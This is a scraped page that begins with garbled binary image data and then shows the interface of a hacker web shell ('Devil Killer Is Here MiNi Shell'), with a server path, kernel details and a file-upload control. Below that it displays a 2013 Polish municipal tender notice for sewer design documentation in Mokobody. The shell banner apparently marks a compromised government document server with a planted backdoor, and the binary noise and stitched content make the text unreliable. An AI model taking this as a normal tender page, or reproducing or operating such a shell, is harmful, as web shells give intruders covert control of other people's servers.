JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130131/42454-N-2013.html

<p class="kh_header"><b>Mokobody: Opracowanie dokumentacji projektowo - kosztorysowej kanalizacji sanitarnej dla miejscowości Kapuściaki, Zaliwie - Szpinki i Zaliwie - Piegawki w gminie Mokobody</b><br>
<b>Numer ogłoszenia: 42454 - 2013; data zamieszczenia: 31.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Mokobody , Plac Chreptowicza 25, 08-124 Mokobody, tel. 025 6411323.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji projektowo - kosztorysowej kanalizacji sanitarnej dla miejscowości Kapuściaki, Zaliwie - Szpinki i Zaliwie - Piegawki w gminie Mokobody.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opracowanie dokumentacji projektowo - kosztorysowej kanalizacji sanitarnej dla miejscowości Kapuściaki, Zaliwie - Szpinki i Zaliwie - Piegawki w gminie Mokobody.
Przedmiotowa dokumentacja projektowo - kosztorysowa swoim zasięgiem obejmuje:
sieć kanalizacji sanitarnej grawitacyjnej z  przyłączami na terenie wsi Kapuściaki, Zaliwie - Szpinki i Zaliwie - Piegawki wraz z niezbędną ilością przepompowni ścieków i z rurociągami tłocznymi  włączoną do  istniejących rurociągów kanalizacji sanitarnej.
ZAKRES ZAMÓWIENIA OBEJMUJE: 

1.	  uzgodnienie koncepcji ( wariantów) przebiegu sieci kanalizacyjnej z zamawiającym
2.	opracowanie  map sytuacyjno wysokościowych do celów projektowych, 
             (nowy pomiar) -  ok. 10ha
3.	aktualizacja map do celów projektowych - ok. 50 ha
4.	wykonanie badań geotechnicznych w zakresie wg uznania projektanta;
5.	przygotowanie dokumentów niezbędnych do uzyskania prawomocnej decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia;
6.	przygotowanie dokumentów niezbędnych do uzyskania prawomocnej decyzji o lokalizacji inwestycji celu publicznego;
7.	projekt sieci kanalizacji sanitarnej  w tym kolektory tłoczne o długości ok. 5km 
8.	projekt przepompowni ścieków w ilości ok. 4 kpl.
9.	projekt przyłączy do poszczególnych budynków w ilości ok. 120 szt. Średnia długość przyłącza ok. 30m
10.	opracowanie projektu budowlanego spełniającego wymogi przepisów Prawa Budowlanego i innych  przepisów szczególnych  wraz z opisami i rysunkami niezbędnymi do realizacji robót, w razie potrzeby uzupełnionego szczegółowymi projektami umożliwiającymi wykonanie zamówienia bez konieczności dodatkowych opracowań - w liczbie 6 egzemplarzy,
(opracowania projektu budowlanego z podziałem na poszczególne etapy uzgodnione             z Zamawiającym);
11.	opracowanie operatu wodnoprawnego na przejście pod rzeką Liwiec (szacowana ilość przejść - 2 szt.

UWAGA:
Obszar planowanej inwestycji objęty jest prawną  formą ochrony  przyrody- znajduje się            w obszarze chronionego  krajobrazu  Siedlecko- Węgrowskim Obszarze Chronionego Krajobrazu  oraz w części   znajduje się  w obszarze Natura 2000.
Projekt budowlany winien obejmować swym zakresem całość zadania tj. sieci kanalizacji  sanitarnej  grawitacyjno - ciśnieniowej na terenie ww miejscowości wraz z niezbędną ilością  przepompowni ścieków, rurociągami tłocznymi pomiędzy miejscowościami oraz przyłączami kanalizacyjnymi nieruchomości prywatnych; dokumentacja winna obejmować również projekt zasilania energetycznego (zalicznikowego) przepompowni ścieków od złącza kablowego stanowiącego punkt pomiarowo - rozliczeniowy do szafki sterowniczej w obiekcie przepompowni ścieków;
12.	opracowanie projektów wykonawczych - 6 egz;
13.	w przypadkach koniecznych - uzyskanie wymaganych uzgodnień i przygotowanie dokumentów niezbędnych do uzyskania prawomocnego pozwolenia wodnoprawnego;
14.	uzyskanie wszystkich wymaganych uzgodnień niezbędnych do otrzymania pozwolenia na budowę;
15.	w przypadkach koniecznych wskazanie nieruchomości objętych projektowaną lokalizacją obiektu, dla których konieczny będzie ich podział zgodnie z koncepcją projektową;
16.	opracowanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowanie zawierające zbiory wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące w szczególności wymagania właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny prawidłowości wykonania poszczególnych robót oraz zakresu prac- w liczbie 4 egzemplarzy -                    z podziałem na etapy uzgodnione z Zamawiającym;
17.	opracowanie przedmiarów robót, przez które należy rozumieć opracowanie zawierające opis robót budowlanych w kolejności technologicznej ich wykonania,                 z podaniem liczby jednostek przedmiarowych robót, wynikających z dokumentacji projektowej, oraz podstaw do ustalenia cen jednostkowych robót lub nakładów rzeczowych  łącznie ze  wskazaniem właściwych specyfikacji technicznych wykonania i odbioru robót budowlanych,  - w liczbie 4 egzemplarzy - z podziałem na etapy uzgodnione z Zamawiającym;
18.	opracowanie kosztorysów ofertowych, które posłużą Wykonawcy robót budowlanych do przygotowania oferty (w ww druku należy przewidzieć rubrykę cena jednostkowa  i wartość zadania netto do wypełnienia przez Wykonawcę robót budowlanych) - z podziałem na etapy uzgodnione z Zamawiającym- 4 egz.;
19.	opracowanie zbiorczego zestawienia kosztów przedmiotowej inwestycji w 4 szt. egzemplarzu- z podziałem na etapy uzgodnione z Zamawiającym;
20.	opracowanie kosztorysu inwestorskiego - z podziałem na etapy uzgodnione z Zamawiającym, który należy wykonać zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18 maja  2004r w sprawie określenia  metod i podstaw sporządzania kosztorysu  inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określanych w programie funkcjonalno -użytkowym, (Dz. U. z 2004 r. Nr 130, poz. 1389) - w 4  szt. egzemplarzu,
UWAGA:
w zakres zamówienia wchodzi również aktualizacja kosztorysu inwestorskiego przeprowadzona przez Wykonawcę;
21.	pełnienie nadzoru autorskiego.
22.	dokumentacja projektowa winna zostać  opracowana wg obowiązujących przepisów formalno - prawnych umożliwiających uzyskanie pozwolenia na budowę i właściwy tryb prowadzenia wykonawstwa robót. Wykonawca projektu  zobowiązany jest  uzyskać wymagane opinie, uzgodnienia i sprawdzenia rozwiązań projektowych w zakresie obowiązujących przepisów.
UWAGA:
Forma i zakres przedmiotowego zamówienia publicznego winna być zgodna z:
a)	Rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004r w sprawie określenia metod i podstaw sporządzania kosztorysu  inwestorskiego, obliczania planowanych kosztów prac projektowych  oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno- użytkowym  (Dz. U. z 2004r nr 130, poz. 1389).
b)	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno -użytkowego.

 WYMOGI  w stosunku do opracowań projektowo - kosztorysowych:
Opracowania projektowo - kosztorysowe Wykonawca zobowiązany jest do wykonania                     z podziałem na etapy uzgodnione z zamawiającym.
Na potrzeby dokumentacji projektowej należy sporządzić bilans ścieków dla poszczególnych miejscowości wymienionych w/w zadaniach, uwzględniający rozbudowę sieci kanalizacyjnej. 
Dobór przepompowni ścieków powinien uwzględniać przepływy z ww zadań powiększone o przepływy z miejscowości przeznaczonych do podłączenia w perspektywie (Wólka Proszowska, Żuków,  Ziomaki,  Niwiski ,Wyłazy). 

 UWAGI w stosunku do map projektowych i zakresu opracowania:
W celu oszacowania kosztów wykonania map sytuacyjno - wysokościowych, niezbędnych do opracowania dokumentacji projektowej, powierzchnię obszaru, którego dotyczy przedmiot zamówienia należy określić na podstawie orientacyjnych załączników graficznych do SIWZ oraz wizji w terenie.
Zakres opracowania powyższych map musi spełniać wymogi § 6 Rozporządzenia Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21.02.1995r. w sprawie rodzaju i zakresu opracowań geodezyjno - kartograficznych oraz czynności geodezyjnych obowiązujących               w budownictwie (Dz.U. nr 25, poz. 133).
Opracowanie winno zawierać:
1)	 usytuowanie naziemnych szczegółów terenowych łącznie z granicami władania    (własności) i nieruchomości (działek) i z uwzględnieniem istniejącej zieleni  wysokiej, 
2)	 naturalne i sztuczne ukształtowanie pionowe terenu,
3)	 usytuowanie sieci uzbrojenia terenu z ich charakterystycznymi rzędnymi,
Mapy sytuacyjno - wysokościowe do celów projektowych w skali 1:1000  w zakresie terenów wsi winny obejmować obręb zabudowań wraz z obrysami budynków oraz działki niezabudowane, na których wszczęto procedurę formalno-prawną zmierzającą do wydania decyzji o warunkach zabudowy w okresie do końca 2012r. , z zachowaniem wymogów określonych powyżej.
Mapy sytuacyjno - wysokościowe do celów projektowych w skali 1:1000 w zakresie terenów pasów drogowych łączących miejscowości, winny obejmować pas o szerokości 70m oraz zabudowania i obrysy budynków zlokalizowanych przy tych drogach, z zachowaniem wymogów określonych powyżej.
UWAGA: 
W przypadku lokalizacji zabudowy poza obrębem (szerokością) pasa drogowego -                        w odległości do 100m od pasa drogowego - mapy winny być opracowane jak dla terenu wsi.
Wykonawca winien zaprojektować sieć pozwalającą na odprowadzenie ścieków z budynków istniejących oraz będących w trakcie budowy. W przypadku działek niezabudowanych, przy projektowaniu przyłączy  do granic nieruchomości, należy uwzględnić te działki, na których wszczęto procedurę formalno - prawną, zmierzającą do wydania decyzji o warunkach zabudowy obiektu budowlanego w okresie do końca  2012 r.  
Zakres rzeczowy przedmiotowego zamówienia publicznego jest przewidywanym zakresem do opracowania. W przypadku braku technicznej możliwości grawitacyjnego odprowadzenia ścieków na terenie poszczególnych miejscowości, należy założyć konieczność opracowania niezbędnej dokumentacji dla kanalizacji grawitacyjno - ciśnieniowej wraz z niezbędną ilością przepompowni ścieków. 
Wobec powyższego zaleca się, aby oferent przed złożeniem oferty  dokonał wizji lokalnej               w terenie objętym przedmiotowym zamówieniem. 
Lokalizacja studzienki  przyłącza winna być ustalona po konsultacji z właścicielem posesji (lokalizacja potwierdzona pisemnie przez właściciela posesji), winna ona uwzględniać istniejącą wewnętrzną instalację kanalizacyjną oraz techniczne możliwości odprowadzenia ścieków z budynku. 
Wykonawca we własnym zakresie pozyska mapy sytuacyjno - wysokościowe do celów projektowych terenu objętego opracowaniem.
UWAGA: 
Proponowana lokalizacja sieci kanalizacji sanitarnej wraz z przyłączami oraz ewentualne rozwiązania  techniczne winny być przedłożone do akceptacji  przez Zamawiającego  przed złożeniem wniosków o wydanie uzgodnień przez jednostki branżowe.

 WYMOGI w stosunku do nadzoru autorskiego:
a)  pełnienie nadzoru autorskiego nad robotami budowlanymi wykonywanymi na podstawie projektu budowlanego , zgodnie  z przepisami  prawa budowlanego;
b) wizytowanie terenu  budowy przez cały okres jej trwania na każde wezwanie  zamawiającego
c) współpraca na etapie  wyboru Wykonawcy robót przy udzielaniu odpowiedzi  na zapytania wykonawców dotyczących  dokumentacji technicznej

 UWAGI ogólne:
Cała dokumentacja projektowo - kosztorysowa winna zostać dostarczona Zamawiającemu               w wersji pisemnej w  ilościach  opisanych powyżej  oraz w wersji elektronicznej (na nośniku typu CD) umożliwiającej zgodnie z nowelizowanym prawem zamówień publicznych  umieszczenie  całej dokumentacji jako załącznika do SIWZ na stronie internetowej i jej pobranie:
-	projekt budowlany, projekt wykonawczy w plikach z rozszerzeniem .pdf lub .tif lub .jpg (zeskanowany projekt z uzyskanymi wszystkimi wymaganymi uzgodnieniami)
-	specyfikacje techniczne wykonania i odbioru robót w plikach z  rozszerzeniem .pdf,
-	kosztorysy inwestorskie, kosztorysy ofertowe, przedmiary robót, zbiorcze zestawienia kosztów w plikach z rozszerzeniem .pdf.

 TEREN objęty opracowaniem:
Teren zwartej zabudowy miejscowości  Kapuściaki, Zaliwie - Szpinki i Zaliwie - Piegawki - zgodnie z orientacyjnym załącznikiem graficznym stanowiącym załącznik do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca wniesie wadium w wysokości: 3.000,00 zł (słownie: trzy tysiące złotych 00/100).

	Wadium może być wniesione w jednej lub kilku następujących formach:

	pieniądzu,
	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
		gwarancjach bankowych,
		gwarancjach ubezpieczeniowych,
	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 poz. 1158 z późn. zm.).

	Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego prowadzony w Bank PEKAO S.A. I O  Węgrów  Nr 05 1240 2731 1111 0010 0300 4381, Urząd Gminy  Mokobody Plac Chreptowicza 25 08-124 Mokobody z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. Kserokopię dowodu przelewu należy dołączyć do oferty.

	Wadium w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielonego przez Polską Agencję Rozwoju Przedsiębiorczości, należy wnieść poprzez złożenie oryginału dokumentu w siedzibie Zamawiającego. Kserokopię dokumentu należy dołączyć do oferty. Dokument wadialny powinien być wystawiony na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego.

	Wadium musi być wniesione przed upływem terminu składania ofert. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.

	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.

	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia oraz wniesienia zabezpieczenia należytego wykonania umowy.

	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy PZP lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 

	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:

	 odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, 
	 nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu nie jest wymagane posiadanie zezwolenia, koncesji, licencji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał co najmniej jedną usługę o wartości netto minimum 65.000,00 zł, polegające na wykonaniu dokumentacji projektowej dotyczącej budowy sieci kanalizacji sanitarnej, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował, zarówno na etapie udzielenia zamówienia, jak i jego realizacji co najmniej jedną osobą posiadającą uprawnienia do projektowania, określone przepisami ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz.U. z 2010 r., Nr 243, poz. 1623 ze zmianami) lub odpowiadające im ważne uprawnienia budowlane, w tym również wydane w trybie uznawania kwalifikacji zawodowych cudzoziemców, i która uczestniczyć będzie w wykonywaniu zamówienia, w specjalności:
	a) instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował, zarówno na etapie udzielenia zamówienia, jak i jego realizacji co najmniej jedną osobą posiadającą uprawnienia do projektowania, określone przepisami ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz.U. z 2010 r., Nr 243, poz. 1623 ze zmianami) lub odpowiadające im ważne uprawnienia budowlane, w tym również wydane w trybie uznawania kwalifikacji zawodowych cudzoziemców, i która uczestniczyć będzie w wykonywaniu zamówienia, w specjalności:
	a) instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych,
Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie wymaga szczegółowego wykazania spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
